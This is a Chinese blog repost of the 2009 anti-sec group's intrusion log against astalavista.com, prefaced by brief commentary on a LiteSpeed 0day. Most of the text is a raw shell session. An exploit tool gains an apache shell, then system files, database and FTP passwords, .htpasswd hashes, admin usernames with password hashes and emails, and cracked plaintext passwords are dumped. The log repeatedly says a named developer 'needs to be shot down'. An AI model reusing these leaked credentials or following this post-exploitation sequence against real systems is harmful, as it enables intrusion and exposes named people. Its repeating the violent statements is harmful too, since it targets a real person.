分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow
也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看http://www.litespeedtech.com/litespeed-web-server-features.html。
[root@front3 ~]# curl -I litespeedtech.com
HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
/ _ / / _____//__ ___/ _ / | | / _ / / / /| |/ _____//__ ___/ _ /
/ /_/ / /_____ / | | / /_/ /| | / /_/ / Y / | |/_____ / | | / /_/ /
/ | // / | |/ | / |___/ | / / | |/ / | |/ | /
/____|__ /_______ / |____|/____|__ /_______ /____|__ //___/ |___/_______ / |____|/____|__ /
// // // // // // //
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group
From < <bstyle=”color:black;background-color:#ffff66″>http</b>://<bstyle=”color:black;background-color:#ffff66″>astalavista</b>.<bstyle=”color:black;background-color:#ffff66″>com</b>/faq>:
>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of homeusers, worldwide companies and corporations, educational and non-profitorganizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis forthe past couple of years, contributing in various ways, or requestingservices and information.
Why has Astalavista been targeted?
Other than the fact that they are not doing any of this for the “community” but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.
We wanted to see how good that “team of security and IT professionals” really is.
Let’s begin.
anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner…
LiteSpeed
[+] Injecting shellcode…
[-] Wait for it
[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMPThu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)
sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com
sh-3.2$ pwd
/home/com/public_html
sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx–x–x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
sh-3.2$ head -20 index.php
<?php
/**
* The main page for the CMS
* @copyright CONTREXX CMS - COMVATION AG
* @author Comvation Development Team
* @version v1.0.9.10.1 stable
* @package contrexx
* @subpackage core
* @link http://www.contrexx.com/ contrexx homepage
* @since v0.0.0.0
* @todo Capitalize all class names in project
* @uses /config/configuration.php
* @uses /config/settings.php
* @uses /config/version.php
* @uses /core/API.php
* @uses /core_modules/cache/index.class.php
* @uses /core/error.class.php
* @uses /core_modules/banner/index.class.php
* @uses /core_modules/contact/index.class.php
sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = ‘dev@astalavista.com’; // Ftp login username
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg
sh-3.2$ cat test.php
<?php
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
echo $url;
?>
sh-3.2$ cd modifications/
sh-3.2$ ls -la
total 32
drwxr-xr-x 8 com com 4096 May 11 12:48 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
sh-3.2$ ls -R
.:
com_avtng cronjobs onlinetools pjirc search _tmp
./com_avtng:
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
./com_avtng/scripts:
popunder.js
./cronjobs:
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
./onlinetools:
index.php
./pjirc:
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
./pjirc/img:
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
verre-eau.gif
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
verre-vin.gif
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
./pjirc/snd:
bell2.au ding.au
./search:
searchEngines.php search.php
./_tmp:
defaultPorts.php defaultPorts.txt
sh-3.2$ cd cronjobs/
sh-3.2$ cat exploits.php
[snip]
$categories = array();
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
$expolits = file($milw0rmFile);
$comExploits = array();
[snip]
// manage data
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
// get path and title
$expolits[$x] = trim($expolits[$x]);
$path = str_replace(’./’, FULLPATH .‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0,strpos($expolits[$x], ‘ ‘)));
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
// check if file exists
if (file_exists($path)) {
$text = file_get_contents($path);
// get content and date
//$text = htmlspecialchars($text, ENT_QUOTES);
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
if ($tmptext != ”) {
$text = $tmptext;
} else {
$text = addslashes(htmlentities($text, ENT_QUOTES));
}
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
$tmp = explode('-', $date);
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
$cat = getCategory ($path);
$ext = pathinfo(basename($path));
$ext = $ext['extension'];
$qStr = ”
SELECT `id`
FROM `contrexx_module_exploits`
WHERE `title` = ‘” . $title . “‘
AND `date` = ‘” . $date . “‘
“;
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “/n”;
$q = $_objDB->query($qStr);
if ($q->numRows() == 0) {
// prepare array
$comExploits[$x]['date'] = $date;
$comExploits[$x]['title'] = $title;
$comExploits[$x]['author'] = ‘milw0rm’;
$comExploits[$x]['text'] = $text;
$comExploits[$x]['source'] = $ext;
$comExploits[$x]['url1'] = ”;
$comExploits[$x]['url2'] = ”;
$comExploits[$x]['catid'] = $cat;
$comExploits[$x]['lang'] = ‘2′;
$comExploits[$x]['userid'] = ‘12′;
$comExploits[$x]['startdate'] = ‘0000-00-00′;
$comExploits[$x]['enddate'] = ‘0000-00-00′;
$comExploits[$x]['status'] = ‘1′;
$comExploits[$x]['changelog'] = $date;
}
[snip]
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
<rss version=”2.0″>
<channel>
<title>ASTALAVISTA.com - Exploits</title>
<link>http://www.astalavista.com/exploits</link>
<description>All availably Exploits.</description>
<language>en-us</language>
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Astalavista.com</generator>
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
</channel>
</rss>’;
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
unlink (FULLPATH . ‘/feed/exploits.xml’);
}
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
[snip]
sh-3.2$ cat exploits.sh
#!/bin/sh
###########################################################
# #
# Title: milw0rm exploits adder #
# Description: Add all milw0rm exploits to the #
# Astalavista.com database #
# #
# Company: Astalavista Group #
# Author: Paulo M. Santos #
# E-Mail: paulo.santos@astalavista.ch #
# #
###########################################################
# path
this_path=/home/com/public_html/modifications/cronjobs
# change directory
cd $this_path
cd tmp/
# delete files
rm -rf milw0rm.tar.* &
rm -rf milw0rm/ &
# wget milw0rm paket
wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
# extract milw0rm paket
tar -xvf milw0rm.tar.bz2
# change owner
chown -R com .
chgrp -R com .
# execute php script
cd $this_path
php -q exploits.php
# delete files
rm -rf tmp/milw0rm.tar.*
rm -rf tmp/milw0rm/
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
Paulo M. Santos needs to be shot down.
mysql -u contrexxuser2 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or /g.
Your MySQL connection id is 261694
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type ‘help;’ or ‘/h’ for help. Type ‘/c’ to clear the buffer.
mysql> show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| com_contrexx2 |
| com_contrexx2_live |
| test |
+——————–+
4 rows in set (0.00 sec)
mysql> use com_contrexx2_live
Database changed
mysql> show tables;
+————————————————–+
| Tables_in_com_contrexx2_live |
+————————————————–+
| cc_banner_counter |
| cc_search_counter |
| contrexx_access_group_dynamic_ids |
| contrexx_access_group_static_ids |
| contrexx_access_rel_user_group |
| contrexx_access_settings |
| contrexx_access_user_attribute |
| contrexx_access_user_attribute_name |
| contrexx_access_user_attribute_value |
| contrexx_access_user_core_attribute |
| contrexx_access_user_groups |
| contrexx_access_user_mail |
| contrexx_access_user_profile |
| contrexx_access_user_title |
| contrexx_access_user_validity |
| contrexx_access_users |
| contrexx_backend_areas |
| contrexx_backups |
| contrexx_content |
| contrexx_content_history |
| contrexx_content_logfile |
| contrexx_content_navigation |
| contrexx_content_navigation_history |
| contrexx_ids |
| contrexx_languages |
| contrexx_lib_country |
| contrexx_log |
| contrexx_module_alias_source |
| contrexx_module_alias_target |
| contrexx_module_block_blocks |
| contrexx_module_block_rel_lang |
| contrexx_module_block_rel_pages |
| contrexx_module_block_settings |
| contrexx_module_blog_categories |
| contrexx_module_blog_comments |
| contrexx_module_blog_message_to_category |
| contrexx_module_blog_messages |
| contrexx_module_blog_messages_lang |
| contrexx_module_blog_networks |
| contrexx_module_blog_networks_lang |
| contrexx_module_blog_settings |
| contrexx_module_blog_votes |
| contrexx_module_calendar |
| contrexx_module_calendar_access |
| contrexx_module_calendar_categories |
| contrexx_module_calendar_form_data |
| contrexx_module_calendar_form_fields |
| contrexx_module_calendar_registrations |
| contrexx_module_calendar_settings |
| contrexx_module_calendar_style |
| contrexx_module_contact_form |
| contrexx_module_contact_form_data |
| contrexx_module_contact_form_field |
| contrexx_module_contact_settings |
| contrexx_module_data_categories |
| contrexx_module_data_message_to_category |
| contrexx_module_data_messages |
| contrexx_module_data_messages_lang |
| contrexx_module_data_placeholders |
| contrexx_module_data_settings |
| contrexx_module_directory_access |
| contrexx_module_directory_categories |
| contrexx_module_directory_dir |
| contrexx_module_directory_inputfields |
| contrexx_module_directory_levels |
| contrexx_module_directory_mail |
| contrexx_module_directory_rel_dir_cat |
| contrexx_module_directory_rel_dir_level |
| contrexx_module_directory_settings |
| contrexx_module_directory_settings_google |
| contrexx_module_directory_vote |
| contrexx_module_docsys |
| contrexx_module_docsys_categories |
| contrexx_module_egov_configuration |
| contrexx_module_egov_orders |
| contrexx_module_egov_product_calendar |
| contrexx_module_egov_product_fields |
| contrexx_module_egov_products |
| contrexx_module_egov_settings |
| contrexx_module_exploits |
| contrexx_module_exploits_categories |
| contrexx_module_feed_category |
| contrexx_module_feed_news |
| contrexx_module_feed_newsml_association |
| contrexx_module_feed_newsml_categories |
| contrexx_module_feed_newsml_documents |
| contrexx_module_feed_newsml_providers |
| contrexx_module_forum_access |
| contrexx_module_forum_categories |
| contrexx_module_forum_categories_lang |
| contrexx_module_forum_notification |
| contrexx_module_forum_postings |
| contrexx_module_forum_rating |
| contrexx_module_forum_settings |
| contrexx_module_forum_statistics |
| contrexx_module_gallery_categories |
| contrexx_module_gallery_comments |
| contrexx_module_gallery_language |
| contrexx_module_gallery_language_pics |
| contrexx_module_gallery_pictures |
| contrexx_module_gallery_settings |
| contrexx_module_gallery_votes |
| contrexx_module_guestbook |
| contrexx_module_guestbook_settings |
| contrexx_module_livecam |
| contrexx_module_livecam_settings |
| contrexx_module_market |
| contrexx_module_market_access |
| contrexx_module_market_categories |
| contrexx_module_market_mail |
| contrexx_module_market_paypal |
| contrexx_module_market_settings |
| contrexx_module_market_spez_fields |
| contrexx_module_mediadir_access |
| contrexx_module_mediadir_categories |
| contrexx_module_mediadir_comments |
| contrexx_module_mediadir_dir |
| contrexx_module_mediadir_inputfields |
| contrexx_module_mediadir_levels |
| contrexx_module_mediadir_mail |
| contrexx_module_mediadir_rel_dir_cat |
| contrexx_module_mediadir_rel_dir_level |
| contrexx_module_mediadir_reports |
| contrexx_module_mediadir_settings |
| contrexx_module_mediadir_settings_google |
| contrexx_module_mediadir_vote |
| contrexx_module_memberdir_directories |
| contrexx_module_memberdir_name |
| contrexx_module_memberdir_settings |
| contrexx_module_memberdir_values |
| contrexx_module_nettools_allowed_groups |
| contrexx_module_nettools_settings |
| contrexx_module_news |
| contrexx_module_news_access |
| contrexx_module_news_categories |
| contrexx_module_news_settings |
| contrexx_module_news_teaser_frame |
| contrexx_module_news_teaser_frame_templates |
| contrexx_module_news_ticker |
| contrexx_module_newsletter |
| contrexx_module_newsletter_attachment |
| contrexx_module_newsletter_category |
| contrexx_module_newsletter_confirm_mail |
| contrexx_module_newsletter_rel_cat_news |
| contrexx_module_newsletter_rel_user_cat |
| contrexx_module_newsletter_settings |
| contrexx_module_newsletter_template |
| contrexx_module_newsletter_tmp_sending |
| contrexx_module_newsletter_user |
| contrexx_module_newsletter_user_title |
| contrexx_module_onlinetools_defaultports |
| contrexx_module_onlinetools_defaultports_back |
| contrexx_module_onlinetools_geolitecity_blocks |
| contrexx_module_onlinetools_geolitecity_country |
| contrexx_module_onlinetools_geolitecity_location |
| contrexx_module_podcast_category |
| contrexx_module_podcast_medium |
| contrexx_module_podcast_rel_category_lang |
| contrexx_module_podcast_rel_medium_category |
| contrexx_module_podcast_settings |
| contrexx_module_podcast_template |
| contrexx_module_proxydb |
| contrexx_module_recommend |
| contrexx_module_repository |
| contrexx_module_securitynews_cats |
| contrexx_module_securitynews_feeds |
| contrexx_module_securitynews_news |
| contrexx_module_shop_categories |
| contrexx_module_shop_config |
| contrexx_module_shop_countries |
| contrexx_module_shop_currencies |
| contrexx_module_shop_customers |
| contrexx_module_shop_importimg |
| contrexx_module_shop_lsv |
| contrexx_module_shop_mail |
| contrexx_module_shop_mail_content |
| contrexx_module_shop_manufacturer |
| contrexx_module_shop_order_items |
| contrexx_module_shop_order_items_attributes |
| contrexx_module_shop_orders |
| contrexx_module_shop_payment |
| contrexx_module_shop_payment_processors |
| contrexx_module_shop_pricelists |
| contrexx_module_shop_products |
| contrexx_module_shop_products_attributes |
| contrexx_module_shop_products_attributes_name |
| contrexx_module_shop_products_attributes_value |
| contrexx_module_shop_products_downloads |
| contrexx_module_shop_rel_countries |
| contrexx_module_shop_rel_payment |
| contrexx_module_shop_rel_shipment |
| contrexx_module_shop_shipment_cost |
| contrexx_module_shop_shipper |
| contrexx_module_shop_vat |
| contrexx_module_shop_zones |
| contrexx_module_u2u_address_list |
| contrexx_module_u2u_message_log |
| contrexx_module_u2u_sent_messages |
| contrexx_module_u2u_settings |
| contrexx_module_u2u_user_log |
| contrexx_modules |
| contrexx_sessions |
| contrexx_settings |
| contrexx_settings_smtp |
| contrexx_skins |
| contrexx_stats_browser |
| contrexx_stats_colourdepth |
| contrexx_stats_config |
| contrexx_stats_country |
| contrexx_stats_hostname |
| contrexx_stats_javascript |
| contrexx_stats_operatingsystem |
| contrexx_stats_referer |
| contrexx_stats_requests |
| contrexx_stats_requests_summary |
| contrexx_stats_screenresolution |
| contrexx_stats_search |
| contrexx_stats_spiders |
| contrexx_stats_spiders_summary |
| contrexx_stats_visitors |
| contrexx_stats_visitors_summary |
| contrexx_voting_additionaldata |
| contrexx_voting_email |
| contrexx_voting_rel_email_system |
| contrexx_voting_results |
| contrexx_voting_system |
| foo |
+————————————————–+
227 rows in set (0.01 sec)
mysql> select count(*) as skids from contrexx_access_users;
+——-+
| skids |
+——-+
| 53699 |
+——-+
1 row in set (0.00 sec)
mysql> describe contrexx_access_users;
+——————+——————————————+——+—–+————–+—————-+
| Field | Type | Null | Key | Default | Extra |
+——————+——————————————+——+—–+————–+—————-+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| is_admin | tinyint(1) unsigned | NO | | 0 | |
| username | varchar(40) | YES | MUL | NULL | |
| password | varchar(32) | YES | | NULL | |
| regdate | int(14) unsigned | NO | | 0 | |
| expiration | int(14) unsigned | NO | | 0 | |
| validity | int(10) unsigned | NO | | 0 | |
| last_auth | int(14) unsigned | NO | | 0 | |
| last_activity | int(14) unsigned | NO | | 0 | |
| email | varchar(255) | YES | | NULL | |
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
| backend_lang_id | int(2) unsigned | NO | | 0 | |
| active | tinyint(1) | NO | | 0 | |
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
| restore_key | varchar(32) | NO | | | |
| restore_key_time | int(14) unsigned | NO | | 0 | |
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
+——————+——————————————+——+—–+————–+—————-+
18 rows in set (0.00 sec)
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
+————+———————————-+—————————–+
| username | password | email |
+————+———————————-+—————————–+
| system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com |
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
| schmid | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com |
+————+———————————-+—————————–+
4 rows in set (0.04 sec)
mysql> exit;
Bye
[~] There you go, your “team of security and IT professionals” is a joke.
+——————————+
system:f82BN3+_*
Be1er0ph0r:belerophor4astacom
prozac:asta4cms!
commander:mpbdaagf6m
sykadul:ak29eral
+——————————+
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
[~] Lets move to astalavista.net now,
From <https://www.astalavista.net/>:
>> Everyone knows that the best defense is a good offense.
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
>> It.s a platform for both IT specialists and novices, andanyone interested in expanding and updating their knowledge regardingIT security and hacking.”
>> Go ahead, try and hack our server . in a completely legal way!
>> Learn by doing: We offer our members tricky tasks and challenges on an
>> ongoing basis so you can test your knowledge and abilities. You can also
>> demonstrate what you.ve mastered by taking part in regular hacker contests
>> and war games
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
[-] Tricky task: Find home dir of astalavista.net
sh-3.2$ ls -la ~astanet
total 48
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
sh-3.2$ ls -la
total 200
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
